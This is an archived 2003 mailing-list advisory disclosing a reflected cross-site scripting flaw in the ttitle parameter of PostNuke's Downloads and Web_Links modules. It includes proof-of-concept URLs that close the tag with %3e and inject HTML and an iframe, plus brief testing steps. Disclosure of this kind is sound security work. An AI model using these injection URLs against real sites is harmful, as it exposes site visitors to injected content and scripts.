PostNuke Downloads & Web_Links ttitle variable XSS

From: Lorenzo Hernandez Garcia-Hierro (novappcat_private)
Date: Sat Aug 09 2003 - 11:39:07 PDT

Next message: Christopher Hummert: "RE: bug in Invision Power Board"

Previous message: yan feng: "PST Linux Advisor--------Dsh-0.24.0 in debian has a home env Buffer Overflow Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

PostNuke Downloads & Web_Links ttitle variable XSS
------
Product: PostNuke
Vendor: PostNuke WWW.POSTNUKE.COM <http://www.POSTNUKE.COM>
Versions Vulnerable:
PostNuke Phoenix 0.7.x.x
Phoenix 0.7.2.3 with patches ( in all versions )
Phoenix 0.7.2.3 without patches (in all versions )
0.7.2.1
(All prior versions of 0.7.2.3 with/without patches)

NO VULNERABLE VERSIONS

- ?
---------------------

Description:

PostNuke , one of the most used php portal systems , is affected again 
by XSS attacks , now in some modules that use
vulnerable url-passed variables.Again , the XSS is made by closing tags 
technic ( we think that we were the first group using this technic )
and passing the url encoded value of the "> , it is "%3e .

-----------------------------------------
SECURITY HOLES FOUND and PROOFS OF CONCEPT:
-----------------------------------------

I encountered a XSS ( Cross Site Scripting ) vulnerability in the 
ttitle variable of Downloads & Web_Links module that allows you to 
include script code
in the website.

---------------------
| XSS IN            |
|      TTITLE       | 
---------------------

The XSS is in the VARIABLE OF THE DOWNLOADS MODULE CALLED TTITLE :


http://[HOST]/[PATH]/modules.php?
op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=[ID]
&ttitle=[Yeye XSS ;-)]"%3e[XSS ATTACK]

And you get , of course , the xss attack in the download page .

Simple and fast.

And the Web_Links module hole...

http://[HOST]/[PATH]/modules.php?
op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=[ID]
&ttitle=[MORE ? ;-(]"%3e[XSS ATTACK]

Examples:

http://[HOST]/[PATH]/modules.php?
op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=
Mocosoft Utilities"%3e<h1>I like this hell</h1>

http://[HOST]/[PATH]/modules.php?
op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=25532543254
46&ttitle=%73%63%6F,%66%61%6B%20%75"%3e<h1>Un ASCII it...</h1><iframe 
src=http://packetstorm.linuxsecurity.com/javascript/text-convertor-
v2.0.html></iframe>

- Proof of Concepts: -

1.- Check a PostNuke portal.
2.- Check if the Downloads / Web_Links modules are active and..
3.- modify the ttitle variable using "%3e and write a xss attack for 
test it.
4.- that's all folks


-----------
| CONTACT |
-----------

Lorenzo Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com
security.novappc.com
www.lorenzohgh.com
______________________

NSRG-19-7

Next message: Christopher Hummert: "RE: bug in Invision Power Board"
Previous message: yan feng: "PST Linux Advisor--------Dsh-0.24.0 in debian has a home env Buffer Overflow Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 11 2003 - 13:03:56 PDT